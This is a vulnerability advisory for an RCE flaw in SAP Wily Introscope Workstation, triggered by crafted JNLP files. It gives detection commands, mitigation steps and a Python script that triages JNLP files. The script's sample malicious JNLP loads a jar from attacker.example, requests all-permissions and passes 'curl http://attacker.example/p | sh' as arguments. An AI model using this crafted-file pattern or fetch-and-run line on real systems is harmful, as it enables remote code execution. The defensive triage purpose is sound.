Platform: sap
Component: sap-wily-introscope-enterprise-manager-workstation
Fixed in: 10.8.1
CVE-2026-0500 is a critical Remote Code Execution (RCE) vulnerability in SAP Wily Introscope Enterprise Manager (WorkStation). It allows an unauthenticated attacker to execute arbitrary operating system commands on the victim's machine by way of a crafted JNLP (Java Web Start launch) file. The vulnerability affects version 10.8 of the product and is resolved in version 10.8.1.
The impact of CVE-2026-0500 is severe: a successful exploit gives the attacker complete control of the affected system, including the ability to read, modify and delete sensitive data, install malware, and pivot to other systems on the network. The attack vector is a malicious JNLP file hosted at a publicly reachable URL. When a user opens that URL, the crafted JNLP causes the attacker's commands to run on the affected Wily Introscope system, leading to full compromise. Note that, although no authentication is needed, the attack still depends on a user opening the crafted file. The technique resembles earlier JNLP-based exploitation, so widespread impact is plausible while unpatched instances remain exposed.
CVE-2026-0500 was publicly disclosed on January 13, 2026. Its criticality (CVSS 9.6) and the low barrier to exploitation (no authentication required) suggest a high probability of exploitation. No public proof-of-concept (PoC) had been released at the time of writing, but the nature of the flaw makes it a likely candidate for in-the-wild exploitation, so patching should be prioritized.
Organizations running SAP Wily Introscope Enterprise Manager (WorkStation) version 10.8 are at significant risk, particularly those with publicly accessible instances or without robust network segmentation. Shared hosting environments in which multiple users share the same Wily Introscope Server are also especially exposed, since one user's action can compromise the server for everyone.
• linux / server: Monitor system logs (journalctl) for unusual Java process activity or attempts to execute commands via JNLP. Replace the unit name with the systemd service that actually runs the Enterprise Manager; a unit literally called "java" is unlikely to exist.
journalctl -u <introscope_em_unit> -g 'JNLP'
• generic web: Use curl to check whether JNLP files are reachable without authentication.
curl -I https://<your_wily_server>/<potential_jnlp_path>.jnlp
• sap: Review SAP security audit logs for suspicious activity related to the Wily Introscope Server.
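Once a JNLP download has been spotted in proxy or server logs, the next question is whether the file is the legitimate Workstation launcher or one crafted to run commands. The following is an added example (not SAP's or this page's code) that triages a JNLP document for the indicators a crafted file needs: an off-host codebase, a request for all-permissions, jars pulled from a foreign host, and shell-like content in JVM or application arguments. The element names follow the public JNLP format; the expected host "wily.internal.example", the helper names and both sample documents are constructed for illustration.

```python
"""Triage a JNLP file for signs it is crafted to run attacker commands.

Added example, not SAP's or the page's code. Element names follow the
JNLP specification; EXPECTED_HOST and the two sample documents are
constructed for illustration only.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Hypothetical: the only host the Workstation launcher should be served from.
EXPECTED_HOST = "wily.internal.example"

# Shell metacharacters or interpreter names inside an argument suggest the
# value carries a command rather than a plain option.
SHELL_META = re.compile(r"[;|&`$<>]|/bin/sh|\bbash\b|cmd\.exe|powershell", re.I)


def _host_of(url):
    """Lower-cased hostname of an absolute URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def inspect_jnlp(xml_text):
    """Return a list of findings for the JNLP text; an empty list means clean."""
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "jnlp":
        return ["root element is not <jnlp>"]

    # codebase decides where relative jar hrefs are fetched from.
    codebase = root.get("codebase", "")
    if codebase and _host_of(codebase) != EXPECTED_HOST:
        findings.append(f"codebase points off-host: {codebase}")

    # all-permissions lets the launched code escape the Web Start sandbox.
    if root.find("./security/all-permissions") is not None:
        findings.append("requests <all-permissions/>")

    # An absolute jar href on another host means foreign code would be run.
    for jar in root.iter("jar"):
        href = jar.get("href", "")
        if "://" in href and _host_of(href) != EXPECTED_HOST:
            findings.append(f"jar loaded from foreign host: {href}")

    # JVM arguments can smuggle in options or agent paths.
    for j2se in root.iter("j2se"):
        vm_args = j2se.get("java-vm-args", "")
        if SHELL_META.search(vm_args):
            findings.append(f"shell metacharacters in java-vm-args: {vm_args}")

    # Application arguments are the natural place to pass a command line.
    for arg in root.iter("argument"):
        text = (arg.text or "").strip()
        if SHELL_META.search(text):
            findings.append(f"suspicious <argument>: {text}")
    return findings


# Constructed sample: what a legitimate launcher for the expected host looks like.
BENIGN_JNLP = """<jnlp spec="1.0+" codebase="https://wily.internal.example/workstation" href="workstation.jnlp">
  <information><title>Introscope Workstation</title><vendor>Example</vendor></information>
  <resources>
    <j2se version="1.8+" java-vm-args="-Xmx1024m"/>
    <jar href="workstation.jar" main="true"/>
  </resources>
  <application-desc main-class="example.Workstation">
    <argument>--host=wily.internal.example</argument>
  </application-desc>
</jnlp>"""

# Constructed sample: the shape of a crafted file, with the indicators above.
CRAFTED_JNLP = """<jnlp spec="1.0+" codebase="http://attacker.example/drop" href="update.jnlp">
  <information><title>Introscope Workstation</title><vendor>Example</vendor></information>
  <security><all-permissions/></security>
  <resources>
    <j2se version="1.8+" java-vm-args="-Xmx512m"/>
    <jar href="http://attacker.example/drop/loader.jar" main="true"/>
  </resources>
  <application-desc main-class="example.Loader">
    <argument>/bin/sh</argument>
    <argument>-c</argument>
    <argument>curl http://attacker.example/p | sh</argument>
  </application-desc>
</jnlp>"""


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_JNLP), ("crafted", CRAFTED_JNLP)):
        print(name, inspect_jnlp(doc) or "clean")
```

Run it against a JNLP pulled from the server or from a proxy capture; any finding is worth a closer look, while an empty result only means none of these coarse indicators fired, not that the file is safe.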
Exploit status: disclosure
EPSS: 0.12% (31st percentile)
CISA SSVC:
CVSS vector:
The primary mitigation for CVE-2026-0500 is to upgrade SAP Wily Introscope Enterprise Manager (WorkStation) to version 10.8.1 or later without delay. If an immediate upgrade is not feasible, apply temporary workarounds: restrict access to the Wily Introscope Server through a Web Application Firewall (WAF) or reverse proxy, block the download and launch of JNLP files from untrusted sources, and monitor network traffic for suspicious JNLP downloads and execution attempts. Also review and restrict user permissions so that a successful exploit yields as little as possible.
Apply the security update provided by SAP as described in SAP Note 3668679. This fixes the vulnerability in the third-party component and prevents remote code execution. See the SAP documentation for detailed instructions on applying the update.
CVE-2026-0500 is a critical Remote Code Execution vulnerability in SAP Wily Introscope Enterprise Manager (WorkStation) allowing attackers to execute OS commands via a malicious JNLP file.
Yes, if you are running SAP Wily Introscope Enterprise Manager (WorkStation) version 10.8, you are affected by this vulnerability.
Upgrade to version 10.8.1 or later to remediate the vulnerability. If immediate upgrade is not possible, implement temporary workarounds like WAF rules.
While no public exploit is currently available, the vulnerability's severity and ease of exploitation suggest a high probability of exploitation in the wild.
Refer to the official SAP Security Advisory for detailed information and remediation steps: [https://www.sap.com/security/bulletins.html](https://www.sap.com/security/bulletins.html)